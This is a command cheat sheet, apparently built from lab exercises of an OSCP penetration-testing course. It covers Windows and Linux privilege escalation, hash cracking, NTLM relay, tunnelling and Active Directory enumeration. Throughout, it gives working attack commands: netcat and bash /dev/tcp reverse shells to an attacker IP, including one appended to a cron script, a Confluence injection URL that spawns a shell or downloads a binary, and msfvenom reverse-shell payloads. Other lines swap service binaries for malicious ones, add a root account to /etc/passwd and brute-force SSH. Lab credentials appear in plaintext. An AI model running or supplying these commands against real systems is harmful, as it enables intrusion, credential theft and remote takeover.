- cmd: impacket-psexec relia.com/maildmz:DPuBT9tGCBrTbR@192.168.244.189
lang: sh
tags: oscp
desc: Using psexec to get an interactive shell
- cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
lang: sh
tags: oscp
desc: Using wmiexec to get an interactive shell
- cmd: ip a ; sudo responder -I tap0
lang: ps1
tags: oscp
desc: Starting Responder on interface tap0
- cmd: dir \\192.168.119.2\test
lang: ps1
tags: oscp
desc: Using the dir command to create an SMB connection to our Kali machine
- cmd: cat paul.hash ; hashcat --help | grep -i "ntlm"
lang: sh
tags: oscp
desc: Contents of paul.hash and Hashcat mode
- cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
lang: sh
tags: oscp
desc: Cracking the NetNTLMv2 hash of paul
- cmd: sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
lang: sh
tags: oscp
desc: Starting ntlmrelayx for a Relayattack targeting FILES02
- cmd: dir \\192.168.119.2\test
lang: sh
tags: oscp
desc: Using the dir command to create an SMB connection to our Kali machine
- cmd: powershell ; Get-LocalUser
lang: ps1
tags: oscp
desc: Display local users on CLIENT220
- cmd: Get-LocalGroup
lang: ps1
tags: oscp
desc: Display local groups on CLIENTWK220
- cmd: Get-LocalGroupMember adminteam ; Get-LocalGroupMember Administrators
lang: ps1
tags: oscp
desc: Display members of the group adminteam
- cmd: systeminfo
lang: ps1
tags: oscp
desc: Information about the operating system and architecture
- cmd: ipconfig /all
lang: ps1
tags: oscp
desc: Information about the network configuration
- cmd: route print
lang: ps1
tags: oscp
desc: Routing table on CLIENTWK220
- cmd: netstat -ano
lang: ps1
tags: oscp
desc: Active network connections on CLIENTWK220
- cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ; Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
lang: ps1
tags: oscp
desc: Installed applications on CLIENTWK220
- cmd: Get-Process
lang: ps1
tags: oscp
desc: Running processes on CLIENTWK220
- cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
lang: ps1
tags: oscp
desc: Searching for sensitive information in XAMPP directory
- cmd: type C:\xampp\passwords.txt ; type C:\xampp\mysql\bin\my.ini
lang: ps1
tags: oscp
desc: Review the contents of passwords.txt and my.ini
- cmd: Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
lang: ps1
tags: oscp
desc: Searching for text files and password manager databases in the home directory of dave
- cmd: cat Desktop\asdf.txt
lang: ps1
tags: oscp
desc: Contents of asdf.txt
- cmd: net user steve
lang: ps1
tags: oscp
desc: Local groups user steve is a member of
- cmd: type C:\xampp\mysql\bin\my.ini
lang: ps1
tags: oscp
desc: Contents of the my.ini file
- cmd: net user backupadmin
lang: ps1
tags: oscp
desc: Local groups backupadmin is a member of
- cmd: runas /user:backupadmin cmd
lang: ps1
tags: oscp
desc: Using Runas to execute cmd as user backupadmin
- cmd: Get-History
lang: ps1
tags: oscp
desc: Empty result from GetHistory
- cmd: (Get-PSReadlineOption).HistorySavePath
lang: ps1
tags: oscp
desc: Display path of the history file from PSReadline
- cmd: type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
lang: ps1
tags: oscp
desc: Empty result from GetHistory
- cmd: type C:\Users\Public\Transcripts\transcript01.txt
lang: ps1
tags: oscp
desc: Contents of the transcript file
- cmd: $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force ; $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password) ; Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
lang: ps1
tags: oscp
desc: Using the commands from the transcript file to obtain a PowerShell session as daveadmin
- cmd: evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"
lang: ps1
tags: oscp
desc: Using evilwinrm to connect to CLIENTWK220 as daveadmin
- cmd: icacls "C:\xampp\apache\bin\httpd.exe"
lang: ps1
tags: oscp
desc: Permissions of _httpd.exe_
- cmd: x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
lang: sh
tags: oscp
desc: CrossCompile the C Code to a 64bit application
- cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe ; move C:\xampp\mysql\bin\mysqld.exe mysqld.exe ; move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
lang: ps1
tags: oscp
desc: Replacing mysqld.exe with our malicious binary
- cmd: net stop mysql
lang: ps1
tags: oscp
desc: Attempting to stop the service in order to restart it
- cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
lang: ps1
tags: oscp
desc: Obtain Startup Type for mysql service
- cmd: whoami /priv
lang: ps1
tags: oscp
desc: Checking for reboot privileges
- cmd: shutdown /r /t 0
lang: ps1
tags: oscp
desc: Rebooting the machine
- cmd: Get-LocalGroupMember administrators
lang: ps1
tags: oscp
desc: Display members of the local administrators group
- cmd: iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-ModifiableServiceFile
lang: ps1
tags: oscp
desc: Import PowerUp.ps1 and execute GetModifiableServiceFile
- cmd: Install-ServiceBinary -Name 'mysql'
lang: ps1
tags: oscp
desc: Error from AbuseFunction
- cmd: $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument -conf=C:\test\path' | Get-ModifiablePath -Literal ; $ModifiableFiles
lang: ps1
tags: oscp
desc: Analyzing the function ModifiablePath
- cmd: icacls .\Documents\BetaServ.exe
lang: ps1
tags: oscp
desc: Displaying permissions on the binary of BetaService
- cmd: Restart-Service BetaService
lang: ps1
tags: oscp
desc: Restarting BetaService
- cmd: $env:path
lang: ps1
tags: oscp
desc: Display the PATH environment variable
- cmd: x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
lang: sh
tags: oscp
desc: CrossCompile the C++ Code to a 64bit DLL
- cmd: Restart-Service BetaService ; net user ; net localgroup administrators
lang: ps1
tags: oscp
desc: Restart the service _BetaService_ and confirm _dave2_ was created as local administrator
- cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName
lang: ps1
tags: oscp
desc: List of services with binary path
- cmd: wmic service get name,pathname | findstr /i /v ...
lang: ps1
tags: oscp
desc: List of services with spaces and missing quotes in the binary path
- cmd: Start-Service GammaService ; Stop-Service GammaService
lang: ps1
tags: oscp
desc: Using StartService and StopService to check if user steve has permissions to start and stop GammaService
- cmd: icacls "C:\" ; icacls "C:\Program Files"
lang: ps1
tags: oscp
desc: Reviewing permissions on the paths __C:\\__ and __C:\\Program Files\\__
- cmd: icacls "C:\Program Files\Enterprise Apps"
lang: ps1
tags: oscp
desc: Reviewing permissions on the __Enterprise Apps__ directory
- cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe ; copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
lang: ps1
tags: oscp
desc: Download adduser.exe, save it as Current.exe, and copy it to Enterprise Apps directory
- cmd: Start-Service GammaService ; net user ; net localgroup administrators
lang: ps1
tags: oscp
desc: Start service GammaService and confirm that dave2 was created as member of local Administrators group
- cmd: iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-UnquotedService
lang: ps1
tags: oscp
desc: Using GetUnquotedService to list potential vulnerable services
- cmd: Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe" ; Restart-Service GammaService ; net user ; net localgroup administrators
lang: ps1
tags: oscp
desc: Using the AbuseFunction to exploit the unquoted service path of GammaService
- cmd: schtasks /query /fo LIST /v
lang: ps1
tags: oscp
desc: Display a list of all scheduled tasks on CLIENTWK220
- cmd: icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
lang: ps1
tags: oscp
desc: Display permissions on the executable file __BackendCacheCleanup.exe__
- cmd: iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exe ; move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak ; move .\BackendCacheCleanup.exe .\Pictures\
lang: ps1
tags: oscp
desc: Download and replace executable file __BackendCacheCleanup.exe__
- cmd: net user ; net localgroup administrators
lang: ps1
tags: oscp
desc: Display permissions on the executable file __BackendCacheCleanup.exe__
- cmd: .\PrintSpoofer64.exe -i -c powershell.exe
lang: ps1
tags: oscp
desc: Using the _PrintSpoofer_ tool to get an interactive PowerShell session in the context of NT AUTHORITY\\SYSTEM.
- cmd: ls -l /etc/shadow
lang: sh
tags: oscp
desc: Inspecting file permissions and users ownership
- cmd: routel
lang: sh
tags: oscp
desc: Printing the routes on Linux
- cmd: ss -anp
lang: sh
tags: oscp
desc: Listing all
- cmd: cat /etc/iptables/rules.v4
lang: sh
tags: oscp
desc: Inspecting custom IP tables
- cmd: ls -lah /etc/cron*
lang: sh
tags: oscp
desc: Listing all cron
- cmd: crontab -l
lang: sh
tags: oscp
desc: Listing cron jobs for the current user
- cmd: sudo crontab -l
lang: sh
tags: oscp
desc: Listing cron jobs for the root user
- cmd: dpkg -l
lang: sh
tags: oscp
desc: Listing all
- cmd: find / -writable -type d 2>/dev/null
lang: sh
tags: oscp
desc: Listing all world
- cmd: cat /etc/fstab ; mount
lang: sh
tags: oscp
desc: Listing content
- cmd: lsblk
lang: sh
tags: oscp
desc: Listing all
- cmd: lsmod
lang: sh
tags: oscp
desc: Listing loaded
- cmd: /sbin/modinfo libata
lang: sh
tags: oscp
desc: Displaying
- cmd: find / -perm -u=s -type f 2>/dev/null
lang: sh
tags: oscp
desc: Searching for
- cmd: env
lang: sh
tags: oscp
desc: Inspecting Environment Variables
- cmd: cat .bashrc
lang: sh
tags: oscp
desc: Inspecting .bashrc
- cmd: su - root
lang: sh
tags: oscp
desc: Becoming 'root' user with the leaked credential
- cmd: crunch 6 6 -t Lab%%% > wordlist
lang: sh
tags: oscp
desc: Generating a wordlist for a bruteforce attack
- cmd: cat wordlist
lang: sh
tags: oscp
desc: Inspecting the Wordlist Content
- cmd: hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V
lang: sh
tags: oscp
desc: Successfully bruteforced eve's password
- cmd: ssh eve@192.168.50.214
lang: sh
tags: oscp
desc: Successfully Logged in as eve
- cmd: sudo -i
lang: sh
tags: oscp
desc: Elevating to root
- cmd: watch -n 1 "ps -aux | grep pass"
lang: sh
tags: oscp
desc: Harvesting Active Processes for Credentials
- cmd: sudo tcpdump -i lo -A | grep "pass"
lang: sh
tags: oscp
desc: Using tcpdump to Perform Password Sniffing
- cmd: grep "CRON" /var/log/syslog
lang: sh
tags: oscp
desc: Inspecting the cron log file
- cmd: cat /home/joe/.scripts/user_backups.sh ; ls -lah /home/joe/.scripts/user_backups.sh
lang: sh
tags: oscp
desc: Showing the content and
- cmd: cd .scripts ; echo >> user_backups.sh ; echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <cr>192.168.118.2</cr> 1234 >/tmp/f" >> user_backups.sh ; cat user_backups.sh
lang: sh
tags: oscp
desc: Inserting a reverse shell
- cmd: openssl passwd w00t ; echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd ; su root2 ; w00t ; id
lang: sh
tags: oscp
desc: Escalating privileges by
- cmd: passwd
lang: sh
tags: oscp
desc: Executing the passswd program
- cmd: ps u -C passwd
lang: sh
tags: oscp
desc: Inspecting passwd's process credentials
- cmd: grep Uid /proc/1932/status
lang: sh
tags: oscp
desc: Inspecting passwd's process credentials
- cmd: cat /proc/1131/status | grep Uid
lang: sh
tags: oscp
desc: Inspecting passwd's process credentials
- cmd: ls -asl /usr/bin/passwd
lang: sh
tags: oscp
desc: Revealing the SUID flag in the passwd binary application
- cmd: find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
lang: sh
tags: oscp
desc: Getting a root shell by abusing SUID program
- cmd: /usr/sbin/getcap -r / 2>/dev/null
lang: sh
tags: oscp
desc: Manually Enumerating Capabilities
- cmd: perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' ; id
lang: sh
tags: oscp
desc: Getting a root shell through capabilities exploitation
- cmd: sudo -l
lang: sh
tags: oscp
desc: Inspecting current user's sudo permissions
- cmd: COMMAND='id' ; TF=$(mktemp) ; echo "$COMMAND" > $TF ; chmod +x $TF ; sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
lang: sh
tags: oscp
desc: Attempting to abuse tcpdump sudo permissions
- cmd: cat /var/log/syslog | grep tcpdump
lang: sh
tags: oscp
desc: Inspecting the syslog file for 'tcpdump' related events
- cmd: su - root ; aa-status
lang: sh
tags: oscp
desc: Verifying AppArmon status
- cmd: sudo apt-get changelog apt ; id
lang: sh
tags: oscp
desc: Obtaining a root shell by abusing sudo permissions
- cmd: cat /etc/issue
lang: sh
tags: oscp
desc: Gathering general information on
- cmd: uname -r ; arch
lang: sh
tags: oscp
desc: Gathering kernel and
- cmd: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"
lang: sh
tags: oscp
desc: Using searchsploit to
- cmd: cp /usr/share/exploitdb/exploits/linux/local/45010.c . ; head 45010.c -n 20
lang: sh
tags: oscp
desc: Identifying the exploit source code instructions.
- cmd: mv 45010.c cve-2017-16995.c
lang: sh
tags: oscp
desc: Renaming the Exploit
- cmd: gcc cve-2017-16995.c -o cve-2017-16995
lang: sh
tags: oscp
desc: Compiling the Exploit on the target machine
- cmd: file cve-2017-16995
lang: sh
tags: oscp
desc: Examining the exploit binary file's architecture
- cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
lang: sh
tags: oscp
desc: Executing the modified reverse shell payload.
- cmd: id
lang: sh
tags: oscp
desc: Bash reverse shell caught by our Netcat listener, and confirmed with the id command.
- cmd: ip addr
lang: sh
tags: oscp
desc: Enumerating network interfaces on CONFLUENCE01.
- cmd: ip route
lang: sh
tags: oscp
desc: Enumerating routes on CONFLUENCE01.
- cmd: cat /var/atlassian/application-data/confluence/confluence.cfg.xml
lang: sh
tags: oscp
desc: The credentials found in the Confluence confluence.cfg.xml file on CONFLUENCE01.
- cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432
lang: sh
tags: oscp
desc: Running the Socat port forward command.
- cmd: psql -h 192.168.50.63 -p 2345 -U postgres ; \l
lang: sh
tags: oscp
desc: Connecting to the PGDATABASE01 PostgreSQL service and listing databases using psql, through our port forward.
- cmd: \c confluence ; select * from cwd_user;
lang: sh
tags: oscp
desc: The contents of the cwd_user table in the confluence database.
- cmd: hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt
lang: sh
tags: oscp
desc: Hashcat having cracked the database_admin, hr_admin and rdp_admin account hashes.
- cmd: ssh database_admin@192.168.50.63 -p2222 ; yes
lang: sh
tags: oscp
desc: Connecting to SSH server on PGDATABASE01, through the port forward on CONFLUENCE01.
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh database_admin@10.4.50.215
lang: sh
tags: oscp
desc: Giving our reverse shell TTY functionality with Python3's pty, and logging into PGDATABASE01 as database_admin.
- cmd: for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done
lang: sh
tags: oscp
desc: Using a bash loop with Netcat to sweep for port 445 in the newlyfound subnet.
- cmd: ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
lang: sh
tags: oscp
desc: Running the local port forward command.
- cmd: proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217
lang: sh
tags: oscp
desc: The NmapoverProxychains command output.
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4 ; yes
lang: sh
tags: oscp
desc: The SSH remote port forward being set up, connecting to the Kali machine.
- cmd: psql -h 127.0.0.1 -p 2345 -U postgres ; \l
lang: sh
tags: oscp
desc: Listing databases on the PGDATABASE01, using psql through the SSH remote port forward.
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 9998 kali@192.168.118.4 ; yes
lang: sh
tags: oscp
desc: Making the SSH connection with the remote dynamic port forwarding option.
- cmd: sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24
lang: sh
tags: oscp
desc: Running sshuttle from our Kali machine, pointing to the forward port on CONFLUENCE01.
- cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64 ; y
lang: sh
tags: oscp
desc: Connecting to the RDP server on MULTISERVER03 using xfreerdp.
- cmd: where ssh
lang: sh
tags: oscp
desc: Finding ssh.exe on MULTISERVER03.
- cmd: ssh.exe -V
lang: sh
tags: oscp
desc: The version of OpenSSH client that is bundled with Windows is higher than 7.6.
- cmd: ssh -N -R 9998 kali@192.168.118.4 ; yes
lang: sh
tags: oscp
desc: Connecting back to our Kali machine to open the remote dynamic port forward.
- cmd: tail /etc/proxychains4.conf
lang: sh
tags: oscp
desc: Proxychains configuration file
- cmd: proxychains psql -h 10.4.50.215 -U postgres ; \l
lang: sh
tags: oscp
desc: Connecting to the PostgreSQL server with psql and Proxychains.
- cmd: sudo systemctl start apache2
lang: sh
tags: oscp
desc: Starting Apache2.
- cmd: find / -name nc.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
lang: sh
tags: oscp
desc: Copying nc.exe to the Apache2 webroot.
- cmd: C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
lang: sh
tags: oscp
desc: The nc.exe reverse shell payload we execute in the web shell.
- cmd: find / -name plink.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/
lang: sh
tags: oscp
desc: Copying plink.exe to our Apache2 webroot.
- cmd: C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4
lang: sh
tags: oscp
desc: Making an SSH connection to the Kali machine.
- cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833 ; y
lang: sh
tags: oscp
desc: Connecting to the RDP server with xfreerdp, through the Plink port forward.
- cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64
lang: sh
tags: oscp
desc: Connecting to the RDP server with xfreerdp.
- cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215
lang: sh
tags: oscp
desc: The portproxy command being run.
- cmd: netstat -anp TCP | find "2222"
lang: sh
tags: oscp
desc: netstat showing that TCP/2222 is listening on the external interface.
- cmd: netsh interface portproxy show all
lang: sh
tags: oscp
desc: Listing all the portproxy port forwarders set up with Netsh.
- cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow
lang: sh
tags: oscp
desc: Poking a hole in the Windows Firewall with Netsh.
- cmd: ssh database_admin@192.168.50.64 -p2222
lang: sh
tags: oscp
desc: SSHing into PGDATABASE01 through the Netsh port forward.
- cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
lang: sh
tags: oscp
desc: Deleting the firewall rule with Netsh.
- cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64
lang: sh
tags: oscp
desc: Deleting the port forwarding rule with Netsh.
- cmd: sudo cp $(which chisel) /var/www/html/
lang: sh
tags: oscp
desc: Copying the Chisel binary to the Apache2 server folder.
- cmd: tail -f /var/log/apache2/access.log
lang: sh
tags: oscp
desc: The request for the Chisel binary hitting our Apache2 server.
- cmd: chisel server --port 8080 --reverse
lang: sh
tags: oscp
desc: Starting the Chisel server on port 8080.
- cmd: sudo tcpdump -nvvvXi tun0 tcp port 8080
lang: sh
tags: oscp
desc: Starting tcpdump to listen on TCP/8080 through the tun0 interface.
- cmd: chisel -h
lang: sh
tags: oscp
desc: The version of Chisel reported as part of the h output, along with the version of Go used to compile it.
- cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/
lang: sh
tags: oscp
desc: The Wget payload executed within our cURL Confluence injection command, again.
- cmd: ss -ntplu
lang: sh
tags: oscp
desc: Using ss to check if our SOCKS port has been opened by the Kali Chisel server.
- cmd: sudo apt install ncat
lang: sh
tags: oscp
desc: Installing Ncat with apt.
- cmd: ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215
lang: sh
tags: oscp
desc: A successful SSH connection through our Chisel HTTP tunnel.
- cmd: cd dns_tunneling ; cat dnsmasq.conf
lang: sh
tags: oscp
desc: The basic configuration for our Dnsmasq server.
- cmd: sudo dnsmasq -C dnsmasq.conf -d
lang: sh
tags: oscp
desc: Starting Dnsmasq with the basic configuration.
- cmd: resolvectl status
lang: sh
tags: oscp
desc: Checking the configured DNS server on PGDATABASE01.
- cmd: nslookup exfiltrated-data.feline.corp
lang: sh
tags: oscp
desc: Using nslookup to make a DNS request for exfiltrateddata.feline.corp
- cmd: cat dnsmasq_txt.conf ; sudo dnsmasq -C dnsmasq_txt.conf -d
lang: sh
tags: oscp
desc: Checking the TXT configuration file then starting Dnsmasq with it.
- cmd: nslookup -type=txt www.feline.corp
lang: ps1
tags: oscp
desc: The TXT record response from www.feline.corp.
- cmd: sudo tcpdump -i ens192 udp port 53
lang: sh
tags: oscp
desc: Starting tcpdump to listen for packets on UDP port 53.
- cmd: dnscat2-server feline.corp
lang: sh
tags: oscp
desc: Starting the dnscat2 server.
- cmd: ./dnscat feline.corp
lang: sh
tags: oscp
desc: The dnscat2 client running on PGDATABASE01.
- cmd: sudo msfdb init
lang: sh
tags: oscp
desc: Creating and initializing the Metasploit database
- cmd: sudo systemctl enable postgresql
lang: sh
tags: oscp
desc: Enabling the postgresql database service at boot time
- cmd: sudo msfconsole
lang: sh
tags: oscp
desc: Starting the Metasploit Framework
- cmd: msfvenom -l payloads --platform windows --arch x64
lang: sh
tags: oscp
desc: Creating a Windows executable with a
- cmd: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe
lang: sh
tags: oscp
desc: Creating a Windows executable with a
- cmd: iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe
lang: sh
tags: oscp
desc: Download nonstaged payload binary and execute it
- cmd: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe
lang: sh
tags: oscp
desc: Creating a Windows executable with a
- cmd: sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza
lang: sh
tags: oscp
desc: Gaining remote desktop access inside
- cmd: sudo msfconsole -r listener.rc
lang: sh
tags: oscp
desc: Executing the resource script
- cmd: iwr -uri http://192.168.119.4/met.exe -Outfile met.exe
lang: sh
tags: oscp
desc: Executing the Windows executable containing the Meterpreter payload
- cmd: ls -l /usr/share/metasploit-framework/scripts/resource
lang: sh
tags: oscp
desc: Listing all resource scripts provided by Metasploit
- cmd: xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75
lang: sh
tags: oscp
desc: Connecting to the Windows 11 client using "xfreerdp"
- cmd: net user /domain
lang: ps1
tags: oscp
desc: Running "net user" to display users in the domain
- cmd: net user jeffadmin /domain
lang: ps1
tags: oscp
desc: Running "net user" against a specific user
- cmd: net group /domain
lang: ps1
tags: oscp
desc: Running "net group" to display groups in the domain
- cmd: net group "Sales Department" /domain
lang: ps1
tags: oscp
desc: Running "net group" to display members in specific group
- cmd: C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
lang: ps1
tags: oscp
desc: Domain class from System.DirectoryServices.ActiveDirectory namespace
- cmd: powershell -ep bypass ; .\enumeration.ps1
lang: ps1
tags: oscp
desc: Output displaying information stored in our first variable
- cmd: .\enumeration.ps1
lang: ps1
tags: oscp
desc: Printing the $PDC variable
- cmd: ([adsi]'').distinguishedName
lang: ps1
tags: oscp
desc: Using ADSI to obtain the DN for the domain
- cmd: Import-Module .\function.ps1
lang: ps1
tags: oscp
desc: Importing our function to memory
- cmd: LDAPSearch -LDAPQuery "(samAccountType=805306368)"
lang: ps1
tags: oscp
desc: Performing a user search using the new function
- cmd: LDAPSearch -LDAPQuery "(objectclass=group)"
lang: ps1
tags: oscp
desc: Searching all possible groups in AD
- cmd: $sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))"
lang: ps1
tags: oscp
desc: Adding the search to our variable called $sales
- cmd: $sales.properties.member
lang: ps1
tags: oscp
desc: Printing the member attribute on the Sales Department group object
- cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))" ; $group.properties.member
lang: ps1
tags: oscp
desc: Printing the member attribute on the Development Department group object
- cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))" ; $group.properties.member
lang: ps1
tags: oscp
desc: Printing the member attribute on the Management Department group object
- cmd: Import-Module .\PowerView.ps1
lang: ps1
tags: oscp
desc: Importing PowerView to memory
- cmd: Get-NetDomain
lang: ps1
tags: oscp
desc: Obtaining domain information
- cmd: Get-NetUser
lang: ps1
tags: oscp
desc: Querying users in the domain
- cmd: Get-NetUser | select cn
lang: ps1
tags: oscp
desc: Querying users using select statement
- cmd: Get-NetUser | select cn,pwdlastset,lastlogon
lang: ps1
tags: oscp
desc: Querying users displaying pwdlastset and lastlogon
- cmd: Get-NetGroup | select cn
lang: ps1
tags: oscp
desc: Querying groups in the domain using PowerView
- cmd: Get-NetGroup "Sales Department" | select member
lang: ps1
tags: oscp
desc: Enumerating the "Sales Department" group
- cmd: Get-NetComputer
lang: ps1
tags: oscp
desc: Partial domain computer overview
- cmd: Get-NetComputer | select operatingsystem,dnshostname
lang: ps1
tags: oscp
desc: Displaying OS and hostname
- cmd: Find-LocalAdminAccess
lang: ps1
tags: oscp
desc: Scanning domain to find local administrative privileges for our user
- cmd: Get-NetSession -ComputerName files04 ; Get-NetSession -ComputerName web04
lang: ps1
tags: oscp
desc: Checking logged on users with GetNetSession
- cmd: Get-NetSession -ComputerName files04 -Verbose ; Get-NetSession -ComputerName web04 -Verbose
lang: ps1
tags: oscp
desc: Adding verbosity to our GetNetSession command
- cmd: Get-NetSession -ComputerName client74
lang: ps1
tags: oscp
desc: Running GetNetSession on CLIENT74
- cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
lang: ps1
tags: oscp
desc: Displaying permissions on the DefaultSecurity registry hive
- cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion
lang: ps1
tags: oscp
desc: Querying operating system and version
- cmd: .\PsLoggedon.exe \\files04
lang: ps1
tags: oscp
desc: Using PsLoggedOn to see user logons at Files04
- cmd: .\PsLoggedon.exe \\web04
lang: ps1
tags: oscp
desc: Using PsLoggedOn to see user logons at Web04
- cmd: .\PsLoggedon.exe \\client74
lang: ps1
tags: oscp
desc: Using PsLoggedOn to see user logons at CLIENT74
- cmd: setspn -L iis_service
lang: ps1
tags: oscp
desc: Listing SPN linked to a certain user account
- cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname
lang: ps1
tags: oscp
desc: Listing the SPN accounts in the domain
- cmd: nslookup.exe web04.corp.com
lang: ps1
tags: oscp
desc: Resolving the web04.corp.com name
- cmd: Get-ObjectAcl -Identity stephanie
lang: ps1
tags: oscp
desc: Running GetObjectAcl specifying our user
- cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
lang: ps1
tags: oscp
desc: Converting the ObjectISD into name
- cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553
lang: ps1
tags: oscp
desc: Converting the SecurityIdentifier into name
- cmd: Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
lang: ps1
tags: oscp
desc: Enumerating ACLs for the Management Group
- cmd: net group "Management Department" stephanie /add /domain
lang: ps1
tags: oscp
desc: Using "net.exe" to add ourselves to domain group
- cmd: net group "Management Department" stephanie /del /domain
lang: ps1
tags: oscp
desc: Using "net.exe" to remove ourselves from domain group
- cmd: Find-DomainShare
lang: ps1
tags: oscp
desc: Domain Share Query
- cmd: ls \\dc1.corp.com\sysvol\corp.com\
lang: ps1
tags: oscp
desc: Listing contents of the SYSVOL share
